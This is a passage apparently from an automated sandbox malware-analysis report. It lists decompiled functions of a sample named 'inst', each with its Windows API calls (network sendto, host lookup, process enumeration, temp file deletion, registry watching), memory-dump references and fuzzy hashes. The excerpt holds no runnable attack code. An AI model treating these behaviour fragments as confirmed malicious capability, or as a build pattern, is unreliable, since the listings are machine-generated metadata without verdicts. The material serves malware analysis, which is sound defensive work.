                                                                                                                                                                      • Instruction ID: 3e26a2ab6796d4a6c721a87da82004ab5621eb1fda04ef1b96428c76c67345f6
                                                                                                                                                                      • Opcode Fuzzy Hash: c4fb67abbaeeb17b8c594129421b2efb50282dd80a162bcbf3171b4d188ab24c
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D01D6F1005110A7D63139655E789BFBABDCF8753CB624927F2ABD6191C530A4C185A2
                                                                                                                                                                      Function 5F51FCFE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F51FD34
                                                                                                                                                                      • htonl.WS2_32(00000000), ref: 5F51FD46
                                                                                                                                                                      • htons.WS2_32(00000000), ref: 5F51FD52
                                                                                                                                                                      • sendto.WS2_32(000007A4,00000000,C7R_,5F5BC814,00000000,00000010), ref: 5F51FD6C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsethtonlhtonssendto
                                                                                                                                                                      • String ID: C7R_
                                                                                                                                                                      • API String ID: 2645352339-4204308585
                                                                                                                                                                      • Opcode ID: a4529193e1b0d4a591c2cd7285678b14c0f56e672dd1a6e6246a2b418558d7bd
                                                                                                                                                                      • Instruction ID: d6b44efe53659da487ad8316fe5b066c8600fbfb373acbc943df9c86660c656d
                                                                                                                                                                      • Opcode Fuzzy Hash: a4529193e1b0d4a591c2cd7285678b14c0f56e672dd1a6e6246a2b418558d7bd
                                                                                                                                                                      • Instruction Fuzzy Hash: EA115E76900208EFDB01DFA4C945EEF7BB5FF48720F10052AF905AB150D771AA64DBA1
                                                                                                                                                                      Function 001A358F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38windowthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A35AF
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A35C0
                                                                                                                                                                      • SetFocus.USER32(?), ref: 001A35C9
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 001A35D6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$CurrentFocusThread
                                                                                                                                                                      • String ID: D!
                                                                                                                                                                      • API String ID: 2448781475-911024508
                                                                                                                                                                      • Opcode ID: 588fcff5c9c93f5fea8290db40d63ab6d2bc7080d7a88357061aa684a8ae1e8f
                                                                                                                                                                      • Instruction ID: 42c6c13f5e1a5f8d5d576227e5fe90e0032ee7b9a8388b983ac4d062e7139fc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 588fcff5c9c93f5fea8290db40d63ab6d2bc7080d7a88357061aa684a8ae1e8f
                                                                                                                                                                      • Instruction Fuzzy Hash: 25F0FC71914610AFDB05A764DD0EE9F76A9EF25710F118518B82793191DF309E019A51
                                                                                                                                                                      Function 001B1A42 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B1A49
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B1A5E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B1A91
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000080), ref: 001B1AD7
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B1B05
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Enabled$ClientH_prolog3RectText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 968978764-0
                                                                                                                                                                      • Opcode ID: 704491afaf1249e951fadb9609c0755f0b52a8134fdb18e1107042515855493a
                                                                                                                                                                      • Instruction ID: ec801322bbc965afa5fbc1ccf0d118d4587e886622da4bca5bbdea6fabf73bc1
                                                                                                                                                                      • Opcode Fuzzy Hash: 704491afaf1249e951fadb9609c0755f0b52a8134fdb18e1107042515855493a
                                                                                                                                                                      • Instruction Fuzzy Hash: BE418771A0060ABFDB21DBA4CC54EEEBBF9FF54344F51442AF512A6090EB716A40CB21
                                                                                                                                                                      Function 001B1D08 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B1D0F
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000064), ref: 001B1D4E
                                                                                                                                                                        • Part of subcall function 0017D354: _wcsnlen.LIBCMT ref: 0017D36B
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B1D8B
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B1DCE
                                                                                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 001B1DEC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: RectWindow$ClientEnabledH_prolog3OffsetText_wcsnlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2890302191-0
                                                                                                                                                                      • Opcode ID: 540b6f5a4c56aa3df82dffe949bba24a621bb4f78ba8efa33f72e3a25143b9a3
                                                                                                                                                                      • Instruction ID: 0f0097230e2f827c6607fe7dd2bf29fce2689bfeffcef158e081222ffa5ab151
                                                                                                                                                                      • Opcode Fuzzy Hash: 540b6f5a4c56aa3df82dffe949bba24a621bb4f78ba8efa33f72e3a25143b9a3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C4138B1900609AFCF14DFA9DD85AEEBBBAFF58304F444119F605A6290DB71AA51CB20
                                                                                                                                                                      Function 001B1E2D Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B1E34
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000064), ref: 001B1E5D
                                                                                                                                                                        • Part of subcall function 0017D354: _wcsnlen.LIBCMT ref: 0017D36B
                                                                                                                                                                      • GetDC.USER32(?), ref: 001B1E70
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 001B1E8B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 001B1EFC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$H_prolog3RectText_wcsnlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1157584674-0
                                                                                                                                                                      • Opcode ID: 7bed216c0b35ff4422a2986d4e5cdb913256711ba02a9fe01f79742e1eeb8a45
                                                                                                                                                                      • Instruction ID: db15dc66df87a4ed96a93bac4a756f8dae6b4b3baf9796de14524d5f784d8a9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7bed216c0b35ff4422a2986d4e5cdb913256711ba02a9fe01f79742e1eeb8a45
                                                                                                                                                                      • Instruction Fuzzy Hash: 93314971900609AFDB25DF95CC8ADFFBBBAFFA4304F500519E512A2190DB71A945CB21
                                                                                                                                                                      Function 001CA52B Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 001CA58E
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 001CA5B9
                                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 001CA5D6
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 001CA5DE
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 001CA5F3
                                                                                                                                                                        • Part of subcall function 001CA29F: GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,001CFC56,?,?,?,00000000,?,?), ref: 001CA2C2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDeleteDrawGdipImageRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 240731188-0
                                                                                                                                                                      • Opcode ID: 14183236523ff642f6f099f435f06126362deaf2158f9103fbcdb136204ad487
                                                                                                                                                                      • Instruction ID: a4f83b8f769278ce5f6d865e93aa922aa4c5668960767b010cdad76c3d0e25ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 14183236523ff642f6f099f435f06126362deaf2158f9103fbcdb136204ad487
                                                                                                                                                                      • Instruction Fuzzy Hash: 6321167150021DEFCF22AF90DC45EAE7BB6FF68304F104419F902A2161DB72EA65EB91
                                                                                                                                                                      Function 5F5203E4 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F520418
                                                                                                                                                                      • inet_addr.WS2_32(?), ref: 5F520428
                                                                                                                                                                      • WSAAsyncGetHostByName.WS2_32(00000000,00000401,?,00000000,00000400), ref: 5F52045C
                                                                                                                                                                      • WSASetLastError.WS2_32(00002733), ref: 5F52046F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncErrorHostLastName_memsetinet_addr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1704644561-0
                                                                                                                                                                      • Opcode ID: 848e3ff7cb7419aafafe40cec5e82ff48b2b1bf7e3ccbd7f29108145cac146e9
                                                                                                                                                                      • Instruction ID: 3aa3dfadb86f0f5e638215b624c9a9ed033a580bf71c096a9392e7a8e2c2ed9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 848e3ff7cb7419aafafe40cec5e82ff48b2b1bf7e3ccbd7f29108145cac146e9
                                                                                                                                                                      • Instruction Fuzzy Hash: 892184B5602304ABDB00DFB4C945EAF77F8AF48724F10462EF51AEB1D1D774AA0087A0
                                                                                                                                                                      Function 0018DDD1 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0018DE07
                                                                                                                                                                      • _memset.LIBCMT ref: 0018DE1E
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0018DE38
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0018DE48
                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,001CE664,00000000,00000000,001CE844,?,00000000,001CE844,?,?), ref: 0018DE6A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset_wcslen$FileOperation
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1469800647-0
                                                                                                                                                                      • Opcode ID: 833dea2a8071242772c6407028b0b74254df9595f291b9d079c5a74fd725e94f
                                                                                                                                                                      • Instruction ID: b6ed53ed64f1048de018f24ed3c2a31bfee24402063d877197a2f22306147c77
                                                                                                                                                                      • Opcode Fuzzy Hash: 833dea2a8071242772c6407028b0b74254df9595f291b9d079c5a74fd725e94f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11517191025C9BDB21EFB8EC49AEE73A8BF18700F500429B519E7181EB3895048B55
                                                                                                                                                                      Function 001CE037 Relevance: 7.6, APIs: 5, Instructions: 52fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE069
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,0024CDA4,?,?), ref: 001CE07D
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE08D
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,001985B6,00000000,?,?,?,?,?,?,?), ref: 001CE0A6
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 001CE0B3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTemp_memset$DeleteNamePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 433304728-0
                                                                                                                                                                      • Opcode ID: 61621b7fd172be74b07b308a59e566964669fe385190a8ec19530db0f10da232
                                                                                                                                                                      • Instruction ID: 7e394d8715032fc28c7a77cd23d4f007549fc33ea6bcaf9b406a9da837beb35f
                                                                                                                                                                      • Opcode Fuzzy Hash: 61621b7fd172be74b07b308a59e566964669fe385190a8ec19530db0f10da232
                                                                                                                                                                      • Instruction Fuzzy Hash: 751188F6A0121C6BCF10DB94EC49FDEB3BCEF54300F1040A5BA15E3181DA74AB848BA5
                                                                                                                                                                      Function 001CD3E1 Relevance: 7.6, APIs: 5, Instructions: 52processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001CD400
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 001CD422
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 001CD42C
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 001CD447
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 001CD45B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1789362936-0
                                                                                                                                                                      • Opcode ID: 154fd8ac82ab62926ab0771a3f475856e2641b43f0b950cefd47565ff73923f5
                                                                                                                                                                      • Instruction ID: fae08a8977d1e9cb5f2cbb6a1d2fa9275de193a26bb6108d9b352f56caa15354
                                                                                                                                                                      • Opcode Fuzzy Hash: 154fd8ac82ab62926ab0771a3f475856e2641b43f0b950cefd47565ff73923f5
                                                                                                                                                                      • Instruction Fuzzy Hash: A611A130500104ABCB24AF34EC89FBEB3F8AB65310F51047DE902D7580EB38EA42CB21
                                                                                                                                                                      Function 001AEC81 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001AB670: DeleteObject.GDI32(?), ref: 001AB68C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(?), ref: 001AEC97
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?), ref: 001AECA8
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 001AECB7
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 001AECC1
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 001AECC8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$DeleteFindHandleLoadLockModuleObjectSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2239502561-0
                                                                                                                                                                      • Opcode ID: 8451cc26ee0362651a7867e679e2bce8f2b75c7283c244efcbfe313e4427bf93
                                                                                                                                                                      • Instruction ID: 4450c3f01d887cd470f20a8f9bf00690042f0c481aceb3db8bf927eb2798df57
                                                                                                                                                                      • Opcode Fuzzy Hash: 8451cc26ee0362651a7867e679e2bce8f2b75c7283c244efcbfe313e4427bf93
                                                                                                                                                                      • Instruction Fuzzy Hash: 10016D36500214BFDF105BA5AC4CEAF7BACEF967607118469FC15D7104DB35DD40C6A0
                                                                                                                                                                      Function 5F5174A3 Relevance: 7.5, APIs: 5, Instructions: 47registrysynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000000,74DF23A0,?,?,5F4F5E2D), ref: 5F5174BC
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,5F4F5E2D), ref: 5F5174C4
                                                                                                                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000000,00000004,?,00000001,?,?,5F4F5E2D), ref: 5F5174F9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeEventNotifyObjectResetSingleValueWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1286042878-0
                                                                                                                                                                      • Opcode ID: 63e3f30a510778baa496c7217ef32f37ccd046b69da91e602221e5eb0aafc0e7
                                                                                                                                                                      • Instruction ID: 30f83ce364ba472900966558c63204852a69165646ad98c2e6320272b14ff8be
                                                                                                                                                                      • Opcode Fuzzy Hash: 63e3f30a510778baa496c7217ef32f37ccd046b69da91e602221e5eb0aafc0e7
